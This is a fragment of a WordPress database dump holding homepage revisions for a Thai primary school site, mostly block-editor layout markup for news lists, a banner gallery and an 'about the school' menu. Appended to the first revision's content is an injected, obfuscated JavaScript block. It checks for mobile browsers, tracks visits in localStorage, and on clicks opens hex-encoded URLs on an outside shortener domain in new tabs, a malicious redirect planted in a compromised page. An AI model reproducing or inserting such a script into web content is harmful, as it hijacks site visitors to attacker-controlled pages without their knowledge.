{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:18:47','2024-07-27 05:18:47','',14,'http://pakhaeng.ssk.in.th/?p=148',0,'revision','',0),
(149,1,'2024-07-27 12:19:19','2024-07-27 05:19:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 